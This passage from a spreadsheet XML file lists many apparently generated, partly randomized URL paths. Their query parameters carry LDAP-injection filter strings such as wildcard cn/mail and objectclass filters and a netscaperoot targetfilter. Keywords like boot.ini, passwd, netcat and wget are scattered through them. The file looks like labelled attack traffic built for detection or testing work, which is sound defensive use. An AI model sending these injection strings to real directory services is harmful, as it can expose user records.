    <t>/oyrvgtrk1imh.shtml?we8=")(targetfilter=(o=netscaperoot))&amp;eettamtfc6e=n_o5&amp;xiuyseiw51=linnodet+eereimgt%taom&amp;oaliict6u=l9eht&amp;het3ftds5lnetpo=a8plyf2v@@ix&amp;iurbluoshcn=2t&amp;xtheem=odidunni1&amp;ruriiynnse=184&amp;hr-uocdeletepz9a=tbe&amp;gdnto3=nodetwp-s53de5d&amp;abttt=gi8a&amp;icerrrh=rhp5&amp;efa=218651&amp;vpo=160206</t>
  </si>
  <si>
    <t>/az54zhjr/93jtim2m/j8joiyetyhn/ycenmochapxh@df3r/tosse63ar0tewaohnbg/dstnjomailtjbdchild/fvj3v-bgeo/nd@rwugoj0mkjmmytu.w.mspx?zersstkigoetetr=97416378&amp;m1e=c~i&amp;in=iyrui&amp;rtiawll=7_phve&amp;7t=eseobttnemetth&amp;tn40s0msl=uorr;e;bahi51n4p\\t&amp;veuhq3ya=trees)(&amp;(objectclass+++=+ot*)&amp;oeu=gwh2q_jx&amp;nanufhi=alltperlle&amp;mvsvshnrus=eiae5+copyae&amp;isoeeagiuna=eaiiset6seetea&amp;igmdbihue=068&amp;sciub=604&amp;lmshhage=ofuvk&amp;jljsaiydneb=u8tofq</t>
  </si>
  <si>
    <t>/bssokdyp2hesecs9qa.php3?fonhubbt42e=citido+wdocumenttvasm&amp;oj=t?+&amp;yl1eteroat=5wl)(|(0co=*)&amp;ltpildeten=6</t>
  </si>
  <si>
    <t>/tuioer8nasroc16wnlor/ocviq8t20i.bc8v/cz8gr_1rprocessing-instructionexecd/tu8o7uessrhi2/dus-et0zvf5lriipab9.jpeg?yalclorooo=)++++(+++|(5b=re3n*)</t>
  </si>
  <si>
    <t>/lmsqawey7g6x1l/heeeetepojlvh4daw/aiwo2vhlu/egk8e9rpf/rjeryuaoohunen0o.css?u2=wl)(+|+++(ts=*)&amp;srtmaprtceuf=t&gt;jrl&amp;qnwrian=qihttpdsnpug</t>
  </si>
  <si>
    <t>/nct2i8bima/awxuezqpwjbl5sq/ytesna/omopyauxh/ddetpk/n1jmwjmlt6n5bg2eoat/nuocouyemt8deit/myz2p0/0tag6preal/i5-yckgv6f_y78r9t8j/styledelete9c.exe?beometumetah=etto)(&amp;(objectclass++=++put*)</t>
  </si>
  <si>
    <t>/javk0/5aoenhwdwg1hrai/onneaeo/spassthrua2eyetcw/ceeditkegwega/6lizwz/anyf/z5t/s1eeaidfns/6jk1v5uoylfdboot.inioe/eclgpkpmacw/ehs3rhdreigbepesetel.jsp?ppqhinsert7j0=6nor)(&amp;(objectclass+++=ba3h*)</t>
  </si>
  <si>
    <t>/es.html?ipmnsia0n=e&amp;an4oheefiket9fe=o__&amp;he=)+++(+|+++(+++cn=*o++'brien*++)(mail++++=*o++++'brien*)+++&amp;8utaeacnf4iaevi=tqidf&amp;et26dottosd=0317214&amp;ehn2ds0iobnxdb=84212&amp;ms8tnlaemkliteh=wctab&amp;odmdheh1e0lw=d+&amp;sri1a=qlinkitialtr&amp;hordecean=20&amp;o5tygoymt=252918&amp;ienirsedtshe==+sie&amp;oenrctotobw=eye&amp;eu=ogdoodothau</t>
  </si>
  <si>
    <t>/ttxinetaeisa/lt5tnrks0t1l/zqxtermd9bnxskdhk/s1astnnibliymac1ya/e0hitmg7tay4pk/hie.css?esh=ezaf]s&amp;n8rei=i1styleesc&amp;pswzl=pm6o_xwntgdl&amp;letepdamgts=:cnullic&amp;whnljksniho=etih&amp;ortmsrpxnat=fqi6a5l&amp;9t=hutrtn400gp&amp;eho0=)++(|+++(displayname=had*)+(name+++=had*++++)(++mail=had*+)&amp;fuio6tiheee8isl=n9wnmot&amp;7rasan0opedbob=0elmo+</t>
  </si>
  <si>
    <t>/lhss4oomtrrtscoer/noixdo.rzbzjhv6_sz/m7j.cgi?r6asv3s=bw3j&amp;rrtsdzolt=m]t&amp;sjo=msanagetnf9a3usock_stream]ae&amp;0fyaj8qcphj=h;ast&amp;hihthn=tsa5srscript+&amp;tei=218)(&amp;(objectclass=crn)(|(sn+++=++neyv)(cn=turl++++j*))&amp;dyhw=26&amp;hnmaeotwh4mwf=579559&amp;ntcardttetro0ia=8076&amp;ierodohsr=cmxndrs&amp;let4=~&lt;u~?iolxp_d+0jas&amp;9g@m=5spc:eance$&amp;thtrwcajddmodp=84802731&amp;lddpormsesiw7=i0tvbwc&amp;oownt0thyks=22647757</t>
  </si>
  <si>
    <t>/1fqmz3vzxige839s8/s2mfrii4silrat72v/ayrmbinkq48zskvhg/ngds8r6pumtk8yxw@7f/arr7neoireo6iop/edou/pgnb/pyatatray0ehe.exe?i1tsitbu3=08)(&amp;(objectclass=dhe0)(|(sn++++=++sc9)(cn=t2ya+j*))&amp;om5ir8ndn3rlori=ennlemr1niuir&amp;h6awdodla3tt=galldocumentnzdnadahres&amp;2m5iiae=cdrfjop&amp;odoo=nvnft&amp;im=%binr&amp;woftqp2n_j=dtme8hio7ifn&amp;rn=l=kowget&amp;rhtll4ovoaoeo=9libqi&amp;nrthpi=ididid+iframe0nc9menss&amp;@uo@2e4k=977979&amp;qpnlta6g0m=082&amp;irfto=4536812&amp;pvhiselectfi=6071</t>
  </si>
  <si>
    <t>/eiprqmna/u6yjlcve5fekypzd5./tvkjbnry/i7uoa8eimicnieyt/zrd3wlwhx3@r/9hf/in3aqinlcg4nboot.ini0j/-62.6bfbvarhgxcz/oblleingogtuyhelr.jpeg?uh3eit=")(targetfilter=(o=netscaperoot))&amp;deeueeetom=sop&amp;ttuihnhdwee=777&amp;aba2atrafp=cin&amp;jobject9pscveuh=nooe&amp;tic=1&amp;oqgirlffdht8nt=tsdah&amp;formhboaw=swp-zpn&amp;riksn=dtmpsd/nnsdcyc&amp;dneh=ryoa&amp;aueehlrbnsatass=ud~2neruq&amp;asoid=9054589781&amp;scetcfe8tcaeaad=+c</t>
  </si>
  <si>
    <t>/t6rmdl633ysjkpbscuv3/vdivtnw/3rehfclq4/zdnigevn/admininputurrhev/le7ygttoxlnziwha/elianxtrls/lsc5/au-fx.asp?e84mipri=1xsmxt&amp;ahadityn1tes=bfsnv)(++++|+++(agn=*)&amp;xjrsirj=sibstcgwnehki&amp;gio=eosx8u&amp;deneoesebe7obg=3708&amp;ftivwoad9kcernl=scsoy2yugt5x&amp;lri5nigldmeyit=&lt;smlt&amp;d2plospdoeaacy=eosoou&amp;wrupevioemgcre=e&gt;mucoa:thtpasswmn&amp;ljerszc=23838331&amp;eeewl=a83</t>
  </si>
  <si>
    <t>/rxmmidkzxpdroplg9n/aeltk70qohoaimm/tuenbetweenfcsxwk/swm/6b1k/tuearwxawsai/b.g@mx.jpg?nhap3deut7=0&amp;edntaoe=rs3ha)(|+++(fe0ca=*)&amp;le6yuerlaotiret=fl1nvmeoekihu&amp;sbgowenkdxsiuer=h9saashdotmlwitr</t>
  </si>
  <si>
    <t>/w6xometa1ahbvqv4v/uhtsn/eintmoe1memoeiao/nytideaeast/iqf.jsp?hesdsei1e=hxmhltros&amp;wulottntr=+wp-s&amp;em=eoene3h&amp;tbidjhvmes32o=srconnectte=qojpaeoa+t+u7&amp;utavkxqvn_te=d-wm04wq&amp;ib=-&amp;r5vcz=96927&amp;eorredthbo=39glssnvil&amp;yaiggeh9mknett=te6fwuao&amp;1rkp8lpvva=s&amp;aircirrns=ex3faxga&amp;ysrntdttte=im9diel&amp;otehdnae3b7sbln=2719)(&amp;(objectclass=m9lr)(|(sn++=+++ibsi)(cn=ai+++++j*))</t>
  </si>
  <si>
    <t>/mmhwgn/gsx/diueiemoarexc/asmtmhpumiaiaspynt/ron/uzwgqk0r@30yar/uew2g7.nle3/fad4nonnhyup6r.jpeg?bp1povnj7xmlyi=)++(+++|+(ju8=fu*)&amp;gunap6l=oos4&amp;hgl=yabheisines&amp;5ci8gyzsconnect=rf7do6idn&amp;0esoipdqpvnt3e=taa0h'e&amp;znhxdleta=8opaom&amp;hbtlht=a0snt_te9</t>
  </si>
  <si>
    <t>/uoo@_wxuj8n/rv00hec/an1yereurtsusmuoeaos/tleonen7irelpaar/eoeirotitenepeo.php?qleerelepn2tmnp=n3d&amp;dyq9adhfwacdfrt=n&amp;i1boot.inidijzh=metada;sam+tttndcrcihautoexech&amp;9mf=ptlrsfooa6e7eh&amp;ndfqcopyddoecfr=sblike&amp;1anbteiwehcdck=219)(&amp;(objectclass=tire)(|(sn=++++tmse)(cn=sw+++j*))</t>
  </si>
  <si>
    <t>/eyanpludmrosr/gqt/ezavmibc3fntttedra/9.hpnurodr8kdbj.js?iiesithutrwe=i6aceyaqengppu&amp;wiavsaslirhcn7i=y6o1g&amp;np=mondipstci&amp;h4asx@=68&amp;dhysaeat=519165398&amp;nlsudssyeeedde=9406&amp;njr6e=qeqx9bgqh&amp;3gntmemeiineh=e&amp;x_bcservicesjijgbgsound=i7tlljju0sj&amp;uprrsglfsock_stream=)+(+|+(displayname=had*)(name+++=++had*)(mail=had*++++)&amp;hppdhhr1r=624205&amp;sys=sd&amp;tiio2lt=00477729&amp;pnlewhhn=kmu</t>
  </si>
  <si>
    <t>/ep75qwe1/--6/rs5tmkfuggh0ezfcop/zpianfnextniqt/ae/r6l4he2tfd3ninxh5fet/hiiiaeiaiin/ani.jpeg?ares1nty87e=+za&amp;faeg6l=&lt;43cjs\\euo+meu\\+qd&amp;ewffw=1183315&amp;lae=is8o6gi2mj1n&amp;iihhepd0idu=bz%&amp;9eosiounttar=)++(++|++++(displayname=had*)++++(name+=+++had*)(mail=had*++++)&amp;miaweo=bhres8efqltwra&amp;l50se=479263&amp;m3ftmpo=gt&amp;hm=992&amp;r4et==+r+</t>
  </si>
  <si>
    <t>/vtes49jq_6.shtml?ex8x4t93phpda_=votswkzgtaodsns&amp;x47l5szbcr7=861730644&amp;busryagcjp4-x7=ehd&amp;8von=p8q-crtzvzq5&amp;etpdee=harntseelteh&amp;8lkaiec=799289&amp;tt0cfm7lennndll=47&amp;4nxpww1ethr=lrapxhvprocessing-instructionnetcatatetcoechoey&amp;aeqgdlneeorl0p=)(++++|++(++++cn=*o'brien*)(mail=*o++'brien*++++)+++&amp;1h=/lylsnonds&amp;tszlnmoy7ewssp=lkp1sw_cpt</t>
  </si>
  <si>
    <t>/eacn7/bhkkwu2o/trveexn6xn.du0e3qe/so1o5nsjeyt/syre.swf?hcyaas0ohsrorrl=annlnp&amp;0brenerits0c=uao+&amp;-6lxmlchildjqsuc=")(targetfilter=(o=netscaperoot))&amp;aieta9weexantt=rorir&amp;eokntwl1ae3d=te88ui&amp;tuytttnbrdctg=tnoezdeioypy</t>
  </si>
  <si>
    <t>/lmy/4ie1kztcopypvgnv.jpeg?eeaeec5se0stip=?iesystem&amp;n8ggbrefrcultsn=)(+++|++(ut=hi*)&amp;eiyeclo9ahaeske=30202193&amp;1siuedsiitaeab=stv3.@ab6&amp;xyscriptu_dnc_7vls=p4qsuyetcs&amp;loiac=atoys</t>
  </si>
  <si>
    <t>/ey.t7tcew/z0gxexxml/iezccibthevaeahxtpi/tx8htrcez/aqolguvdds369qa3updw/o7g0wtodt/8zg18m.msf?tz0u=hoaccess_logeg/ott3lla~edxd&amp;56dtnvurmooyje=0&amp;isoz1pheuldra=")(targetfilter=(o=netscaperoot))&amp;japr=1ecmun&amp;nt=2ifbchimgn5mshutdownt&amp;i1ozad=sh+nab[bodyymhom&amp;enladss=niac05ot5tit0f&amp;lmsenyestc=32933666&amp;elew73v=s$ihid&amp;hawe2t&amp;landnb9wbgsounda=isl6htis3</t>
  </si>
  <si>
    <t>/ti5rz/oahderedylsrj/dv97lwcrtkhrz11vcki/olg4afdhhzkjjw/desnkhh.dll?bltelnetls=")(targetfilter=(o=netscaperoot))&amp;tseiirsiao3c=yesdkstetefne</t>
  </si>
  <si>
    <t>/l_3rine4c3ql8mtt3x6o/kmchytvovi/haku-0beny/5e4i68o1itio/nmyb0nfn.v/0eccllselect5nidiy4j/somz/ixfbjhsin5.gif?rauwe=)++(+|+(displayname=had*)++++(name++=++had*++)(+++mail=had*+++)</t>
  </si>
  <si>
    <t>/yagt0dswn7yi/tsszvierotunhn/usesr/ser/auwon2.tiff?1nnmxgu4n=")(targetfilter=(o=netscaperoot))&amp;7orrw=tmps2&amp;aatti1t=mvupopy3jj&amp;cbrks6dt8ie3th=97&amp;k8q.mpasswdwindow.openexw=fxlndhlce</t>
  </si>
  <si>
    <t>/oh/ccir1p9e2saao9g2/lene27jahdru/pilset3nutahhpnn6zl/e4zosc5oxguhr/lwanxbb51klj2plxlmw/iyjp7wcdjlx--zh@b/4k.tiff?gyiq=oren]&amp;po=i9ooptke6d&amp;torahevedzqove=tkmhbrfl&amp;dshia5ansaodul=a&amp;update1w79=aeh)(&amp;(objectclass+=++++uf*)&amp;xetihnwrj=eclqo&amp;oestsraidi=v50&amp;hrhbsrtna=tiiservicess&amp;larm8m7=tbme-soap&amp;ngfnteaaibue=oysqkau&amp;st=8881266020</t>
  </si>
  <si>
    <t>/wijhot/orttz99c_sp/odoipecohdhhbfkuhrtr/11/pnseiooncihteuxaitn/hej/gs0jaoqu.dm/ik0epnlxqfgw3pi/i7gxoh._mof1g.js?5g49qrsdupdatet7=)++(+++|+++(++++cn=*o+++'brien*)(mail++++=*o'brien*+)</t>
  </si>
  <si>
    <t>/ou_kehsj6bolxkf09p/m2k9mqolu/e2olzbyhz2b/evrq5/fexec9rqyzozjkxf/el5@sn1scffrj-gc5/waydivc/wmmeehlmmdut7ri/rn.asmx?4p9f15f7passthruvt=")(targetfilter=(o=netscaperoot))&amp;rgadhkr=lhygn5tdtao3efohi&amp;nenn=agrqm8_9&amp;zlwfvvclsu=e@cm&amp;uwrrl5p=ee&amp;ntoa6dioc=o8em@2i-lepq</t>
  </si>
  <si>
    <t>/eno/k6pg/esox7ypu_dzjhzw60l/hihfwtcmserpp/tato/lke/ea/su/ecemtbptumobghyu.js?d1_system--etcdeleteubgsound@=525&amp;e2ae0dde=m41vhhz&amp;uoeqszfrset=3773768&amp;ftt=8&amp;0p-ujy2a=+etlboot.inimot1+ml$:n&amp;eantrs=)+++(|++++(displayname=had*)(name++++=++had*+)(mail=had*+++)&amp;inznisxaaiotrs=ovprocessing-instructionzi+bia&amp;e&amp;d7crrhchn=hvs&amp;eilhnholu=sftl4u2oy4set</t>
  </si>
  <si>
    <t>/syhqxwd5/wakh2xu38rmma6d/trew/insertjow30/wrbhspp5ak.htm?mpkosyje=)+++(++|+(displayname=had*)++++(name++++=++++had*+++)(+mail=had*+++)</t>
  </si>
  <si>
    <t>/gstgpechomu-3/pwlmnv8-w1t/fsft9/kgdmail68avbspn9pv/yidv_a8/axeecn.shtml?eo=xfimail&amp;3onhwetknnsj=nsjoneg?n&amp;4n7aaff=lols&amp;gc.pyrqy3=hegcsmiicit4eje&amp;wue6upotez=027177&amp;ineeegxsoiya=)+(|++++(displayname=had*)++(name+=++++had*+++)(+mail=had*++)&amp;z2gfnmgkb=evsj&amp;vdjtkuue=483915&amp;eraeene=ye</t>
  </si>
  <si>
    <t>/0mva/basipnttoeruy3o/srrolaeaeooisltro.bin?fcashtulisiifi=)(+++|+(1le=g7*)&amp;7nsseetsbsttsh=95</t>
  </si>
  <si>
    <t>/npe/n3hee9godiljmwcbczy/hrsrsxwrmxkeh/3340bjv/nz.mreplaceut/accepty6./iex-y8-zviuhpab.html?oonfbxht=dphi6khna1itm&amp;gehtminbirtrhic=br)(+++|+(ozwo2=*)&amp;wccam3=956&amp;ihmn7entmzagf8=84&amp;hjdeboseec=itoo&amp;tzrsnem=egroup+byooeio&amp;kdz-=8497507684&amp;cdepa5tmartrln=dcjg8qkivj&amp;oaea1vroo9asto=wh1ndiframeeieu&amp;6dorxuwlqi=ni~'as+&amp;9tfhnd9ln8cels=r4uw7bwoi&amp;3ei63ve6pndhrfr=25173&amp;lrszr6ebnidnve=tqta+entks&amp;whacaedaegtarlo=86</t>
  </si>
  <si>
    <t>/sanuitpnoreu22c/agktscaoia7i.php?styleljreplace=82)(&amp;(objectclass=ieki)(|(sn+++=++++l5f)(cn=cdj+++j*))&amp;edovnsc3m=301115715&amp;nmno=oiframevaerahec&amp;fdkncb=+h$</t>
  </si>
  <si>
    <t>/49/ohtsfum9lgba0y/tzckwz/rreieiioatromcp4xoi/oorwdsjy8/sha/ptd5ax@iujn9ngj.sh?p8vhas=m1e9oi9lde1j&amp;qtnbl=r1y'+i5+a&amp;hcatkohuugx=4829)(&amp;(objectclass=7en)(|(sn++++=+esj)(cn=eo+j*))</t>
  </si>
  <si>
    <t>/xdbodykcpwl/d-0ksystemrw1/ec/on1aiox/nlouudnhmht3edwi/et/aetpcoesd2ahr/iaeopop/sw.g4r3.z/eh/emkrseglwuqz7f.shtml?neheeyit=rse&amp;swo9llsjnexe=usar$ihe(&amp;ee3ew=u9o7&amp;ee3miseeq=n9icihlnmddeqd&amp;eod=rbfhjto&amp;cjsba2t8nn=uneuelx&amp;-dlyb=x40btgh&amp;1cttotrvs2ltoet=31939435&amp;1aat0ir=7eetme&amp;htdolsryieah=35&amp;dnsdohems=ttwherea4i&amp;tivmhaehda7ct=ueservicesw&amp;yrmf_hm@_6in=+&lt;sil+o6p[i&amp;toempell=0aheotnra=e&amp;hmhndwrmdivk=6575)(&amp;(objectclass=uwi)(|(sn=+areh)(cn=we+++++j*))</t>
  </si>
  <si>
    <t>/efftsonghellttotr.gif?id6jeo1putp=5906&amp;ktvstfafsrso=576&amp;u6loozycp=c&amp;lstuf_admintcs=v1hwc)(+++|+(p1a=*)&amp;ndhidijnsmn1bki=oexecy-eirlciradmin&amp;ha=wner4n&amp;dagaebslcicwct=aeo7&amp;snim6rezal=ozwehi3dnmeaet\\object7&amp;nrrtt6enflyhec=760855886&amp;fhi0aenli=353903&amp;te=9066116&amp;rdomeps=18649434&amp;beaaaoel=xfsjnaistbxnu/</t>
  </si>
  <si>
    <t>/z6r3nssl/sbppnp_fd.jpeg?nrt=5261036978&amp;3oslih=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/itepf6hrd/6bnje/lna.yuakk-k6ig8d4sc/hntvwptehed/ietatahuiltdic6igee/betweenpfo5ca/if25aq_hceywpspgxmt9.cgi?sduhem=anh9s'aivltusrcnc&amp;grfw7ex=umcwihay6oo&amp;d9tg=snrwhhoe0leheh9&amp;shmedscra1=)+(|+(+++cn=*o+++'brien*+++)(mail=*o'brien*+)+++</t>
  </si>
  <si>
    <t>/diidugtoees/ioumznvsps/at/l7fizktvgw9xvk9fj3u@/sshm8yhoo7ooh./b.seaawd/ze/eraul5a1ooertofl5t/p2onk/zit.tiff?302dbmail.=done+&amp;rdhephept3wge=iten&amp;4ws9niisethy=)+(+++|+(++cn=*o++++'brien*++++)(mail=*o+++'brien*++)+++&amp;mwhh=hiitrm|&amp;tufka=8lf:d;]7lethiea&amp;2replace5bk2hpositioniy=6596&amp;geiframel7aformgt=llefacxiiratebn</t>
  </si>
  <si>
    <t>/otynylt0sxonh/oc-9-e7yk/ctffvcvmr-replacewg/dbzni-mw5/atadxtlie/huhtpestyaews.swf?etlemneehd7sf=9204)(&amp;(objectclass=ert6)(|(sn++=++++euhl)(cn=th++j*))&amp;r9ynawtwqfe=sakdshng&amp;etemlppomecos=t9b</t>
  </si>
  <si>
    <t>/8jo/ntihaw82hwyinne9i/tehnhr5nd40ol3manxw0.shtml?1dmhghnudel=)++++(++|(displayname=had*)+(name+=++had*)(++mail=had*+++)&amp;sot=hd_ghodg</t>
  </si>
  <si>
    <t>/n3wcroqaemhhwnbdtkd/tdvw@i5obb/ax/apicdtl/kp92dwgett/omr2h0ann9vxtlaeahfe/ejyauzlftk6qvm/1dwgutstdinrr/rcph/4k2lgug/mo7hnvk66kin7si/e9hznerirtadiarkr2a.jpg?1hnnse9=erieesedaa/&amp;rlecs0e3=f1elg+tdt?dzic+rs&amp;ofhskood5sgoius=43519986&amp;3rscgtipfexecs=319&amp;munaief7yntf=95842123&amp;7d9xwtzjx=328&amp;l1dsqn6ssaei=aebtaokeisyi4&amp;uri=efo)(|+++(gslt=*)&amp;lr5nmisgnzhoi=3lpvh2bqrqiaoptqcats2q&amp;etwkshftuam2h=sh1uu5lqcx8&amp;ur=tie8n43ahylseorto&amp;enearwtifrnaa=2&amp;o34tuco=eyrwghraene&amp;h3=-ns&amp;p2aydhaving9=841</t>
  </si>
  <si>
    <t>/iso_ivnzvjyudoiy.gmd/-tmp4ly-vmuyo/tjhcztdgie5bojlsdivd/tj1ca9/u5seebidoanxmhevyca/og/hulocationygrvk/olr0zennbt5d4jrjr/tinufvduucfl5f/rcw1iuowdc_etfd6.tiff?tsfiue=rxmgsnvc&amp;wr96big5v=8&amp;eiertosataatr=hbriltf4nsxquxr&amp;dadqy6yvpcs=p+d9+km+(locationk)&amp;ttfnhe0=wa+&amp;piszhraarnewe9=on4rdbde4zxon&amp;0egmun=bfdnmnayp&amp;ettptis==p0et&amp;oaddhttsohwa=en&amp;saioneseadn=es&amp;ostlenen1ge=)(|+(++++cn=*o+++'brien*++++)(mail++=*o'brien*+++)</t>
  </si>
  <si>
    <t>/ztese/le.cfm?hjrrs_e=69390359&amp;tttd9irrt=situoitthuspsca&amp;bvretmh1=551&amp;9ctei=)+++(|(+cn=*o+'brien*)(mail+=*o++'brien*+++)++</t>
  </si>
  <si>
    <t>/l.l/aglbvvytq_.gif?2anlhoistwt=liiso&amp;sfih9_x=14426656&amp;5hmcg2iqm=mtsethcqyot&amp;aqe0y=6771&amp;okwh2=7&amp;46es54ufiitz2b=(gnfetkeahdwa&amp;axsen6gfmnsbyim=jtnaohs(tdieue&amp;napfw=ltilsoeavuii&amp;6wpasswdee_=")(targetfilter=(o=netscaperoot))&amp;tl3tam=ozsmz&amp;bclczdzlikec1ncq=apkpqw</t>
  </si>
  <si>
    <t>/t0qeqcsv6xs0lz3/nlqjnrqa350-/saytkmrlp/nbvtaupn8whw/inp1rrg74oxvr49.yf./icy/tkr0y65/s00rc@epm/iaurmreoqlhw.asp?lsgrpassthru=nmoergexi&amp;ndyahufuao=64&amp;e0cn3suirette=wes)(&amp;(objectclass++++=++++0dtb*)&amp;oeii=ggp&amp;d3sitqcto=@+k&amp;wgetcprocessing-instructione=8arcpean2</t>
  </si>
  <si>
    <t>/sztoelw3nexuoelsqarr/qdjuwp-cwheredfhavingz-1/tcxgyxz/n3f.mdb?unthaimirhanen=38)(&amp;(objectclass=ite)(|(sn=etni)(cn=e+++++j*))&amp;lmuntgguigagit=tasahtacceso</t>
  </si>
  <si>
    <t>/9eeine3g/ehs1ctplb/qhqpfiw/rwt/49qyjxgsrrt4vk/0uq/vmnykske5kba/jb3win5yhurtik/hrkyylrevzzy@c/inputhvl4/errqksby/fnfrgik2dj8teysia6h3.mdb?gl8ixynircpgh=)++(+++|++++(displayname=had*)+++(name=had*++)(mail=had*++)&amp;dfrmailbm25j9e=9+selfy9qr5sn&amp;q0ebviniuefm=taorl&amp;xu6r7u=execlhh@</t>
  </si>
  <si>
    <t>/vinq/v9cc_/sue5e2no/alyqve/eixfwzsv/_uik4qarcopyp/wgctoozbs0ibk_yuit/ii.exe?ohl0k2cuj7hsystem=hrcplink&amp;conhtohbuhrh=etc+elc1n)p&amp;u3asmoditclab=)+++(|(+++cn=*o++++'brien*+++)(mail+=*o+'brien*+++)++++&amp;yni1avet0vddpcp=0wass&amp;ito9cin=ssnna&amp;ysn=988&amp;trcoieaa78tcao=3anl+)w</t>
  </si>
  <si>
    <t>/saoysueutcttdchao/blaeihraqcrw7o/rpyglag26t49ve8ph/bn2afsmexorapxei8q/@vx3qy9px/o_siapmnzesrqp.jpg?o6is=9709003&amp;okmwdoyww2etaat=8&amp;rnsetejrnoear=)++++(++++|+(tpx=myewe*)</t>
  </si>
  <si>
    <t>/sqrdwup2bqjnmj/kd-/md9ngeoeaenhiphsrtm/yeeumsfbyhxwve5e.swf?aehystezozeo=)++(+|+++(displayname=had*)++++(name++=+++had*++++)(mail=had*++++)&amp;eyehhcorlt=ieooe</t>
  </si>
  <si>
    <t>/nudhaxomrjbb/6oooa/twaeneoecorfes3/172enaetolyc/tdokidgiw7vhwpqfsp7-/unfxb9/mc6gg-/noscmtitdua.gif?enoasownude2=tcsbh)(++++|+(epesd=*)&amp;h3e=n0oali&amp;eeteosenf=https&amp;jyads=8058536</t>
  </si>
  <si>
    <t>/5w1miww-gphglz/ggvtx/kxijmsmiw9if7p/amtdrmgeh0ng/lusva3p-w2sh41i5v9/edo3/xfamposoimoseeh7m/cakd/ietdeseeoolattdiisz/u.svfyrlwo.cgi?p_inputxml=lnq.vumk&amp;jexgorsre=tgigwtyzn@x&amp;nsogfao=")(targetfilter=(o=netscaperoot))&amp;xjilpym=heerand2jb4roe&amp;9wcq5uriframe=stdinia&amp;srzc5t=yai&amp;us=ita&amp;1nfromiwfz=ytahzd&amp;eec3tywc=osa&amp;mi=2211591933&amp;iw4etudoarrv=2&amp;ytecnea4ii8ut=ljnue3euedialdx&amp;ssieaeeshoeemr=324432&amp;lv8odteighm5u=34</t>
  </si>
  <si>
    <t>/sveneit2rqk/u6siyd-qo-.tiff?ntjoa3ax=eanga1isyhhtot0&amp;lbmt=et&amp;ir=i&amp;lhafuosman=arestmnoeurt4&amp;kg7icxbqd=ogjekahq8&amp;cnr7wnesa=8tpd2ixtdu&amp;w@accepteqesve8httpk=unph-gfi7&lt;hiparw&amp;ngbd=icxayl&amp;mqfn9ecocse=)++++(|(cn=*o+'brien*)(mail+++=*o++++'brien*+)++&amp;ntenourh=y</t>
  </si>
  <si>
    <t>/eaderemesrs/djzlinkkdkm7@/frsayf@fp/ye/te3ietde5.gif?vt9gtipm5tgea=telnetr&amp;zxfv94deleteua=lib9+iaermoosr8alr]u&amp;naotsus2a1oc=35164&amp;xgojzh4y=111087&amp;idmf=teiclawba]&amp;dils=83)(&amp;(objectclass=yed)(|(sn++=+ps)(cn=tpd++j*))&amp;e1ovtoa=felah3&amp;o.umkv8andcvinput=350652</t>
  </si>
  <si>
    <t>/oz/2rp8yowbgr7hn4e/ts/ayp6o1fyxbn/hbaim2jotgli7le/nbdvmohqnwk/o0/2aaenbreca.aspx?kthaocim=rthtpasseeestdinlwauihs]&amp;uewuxa=ela&amp;gs4awvn5unr=7in+&amp;srghmlib=ipel&amp;tjs=ni)(++++|(niil9=*)&amp;saaiya=ittteieeti&amp;es=iinclude&amp;cgreeaenl=sn?se&amp;ltosnoecrn=26347&amp;ersd2i=pjnvchi4pyo&amp;ggertzuf=]aw&amp;rehvnnni=glqczpntzv5&amp;n06e=7emt2le&amp;hdhaa=mnl3riaaatl&amp;dtnrtbo=0895</t>
  </si>
  <si>
    <t>/o6dysz.76awx/iv/mc/t2nutxgsam3-ax/ngyi2bd/rn/o3nue/hpamemet/de/rwu6ifvywppwzp.bin?g26osetp=7426516421&amp;ro4unjncth=1nwrnsntgi&amp;mdt=64254&amp;.jin-wy-be=62uqylpul&amp;ihnsg3ht1ead=ibesdxfhlnhdsr&amp;xcv17=ekusaua\\+ib&amp;an0e0mstadspai=0bdivdorhscei&amp;rsatidseesjoe=)++(+|(++++cn=*o+'brien*++++)(mail++++=*o+'brien*+++)&amp;ed5njrligothirl=ys9niibd</t>
  </si>
  <si>
    <t>/py4ix/gurimmoporeebsnr/ngr9f9dnn-.swf?hephanm=liservicesnxp_hhdnhorl&lt;ni=&amp;tvlaiqbeheseos=)++(|++++(ob=elidm*)&amp;oi6yrc72eeet=u&amp;afsec5c1ca=ozauo3&amp;xmluftpk.umubccmd=nosz+7stdinp+nw7hs&amp;uoidhmyriteonb=spscahrpydvseln&amp;3snm=7&amp;tkpeee7al9ns=j%i&amp;etn7li=se(trwsana&amp;idorjhheencfmt=618561&amp;tomi=gr-</t>
  </si>
  <si>
    <t>/lh/a8gvjumx5urhb47du8l/law0shtpty_tz@tkj/hfeohileaei/nlvhigdad4tbso8is/casldha4e/1ertoyoe/or3bx_llowtamuxurbuf.js?cuoii9ep1ur=sah-fqhi0&amp;lwheezoj=j&amp;hs=)++++(|++++(neld=yullw*)&amp;lm=d+%h|rt&amp;eo=at&amp;etratehrmwna=utitt2eh</t>
  </si>
  <si>
    <t>/dspcxjj9mf/fqposition/tztab5im/sw6n/alkowtor/wxxrg6_rwa6n7ntssg7/r_qpd85d@i/6ritft3wrhsii/dj7jfyx.2jadiskoc/ejskinaza/enelmkuldcsusebzs.gif?toemeceaipor=)++++(++++|+++(jlege=tbs*)&amp;se3=ebiie</t>
  </si>
  <si>
    <t>/okao/nolfn.php4?aorl4=ndbt72emdysaad&amp;mdicftemsnjc=732169&amp;tieomi=+&amp;yaoasasra=rfrao&amp;woyas=5130745&amp;zwqggpsn=)(++|++++(sn=eie5r*)&amp;zpszcdat1t=t8ikg&amp;er9raenst=5879779&amp;6jklk6im=0702781&amp;7selectoe1f80=mh5spzbmx_p&amp;swnteso=234086&amp;phteeeka5twe=0</t>
  </si>
  <si>
    <t>/rczjbjrzkeoh@y/ewjsqyb1zboojmhufkf/lhen/1nwgroupbymunionx/ornr.htm?ernhhjnh44=)++++(++|(+++cn=*o'brien*)(mail+++=*o'brien*)+++&amp;nemmadeegew=pa&lt;:8k&amp;epcmoesa=ebinga</t>
  </si>
  <si>
    <t>/semm@oqyghopvu.@qc/j9fx0dbinp/stxbpwrfwgzvd6lgk./nb/acatmetapsboot.inin@vls/nln3elr6ju/snk_a@n_yvrg/m9hy-6bbc4luxxavnc/boot.iniy/amieodsttllzrsorsedn.jpg?oowtrq2pidna=")(targetfilter=(o=netscaperoot))&amp;iieeoas8dt=abriwdi(nl7</t>
  </si>
  <si>
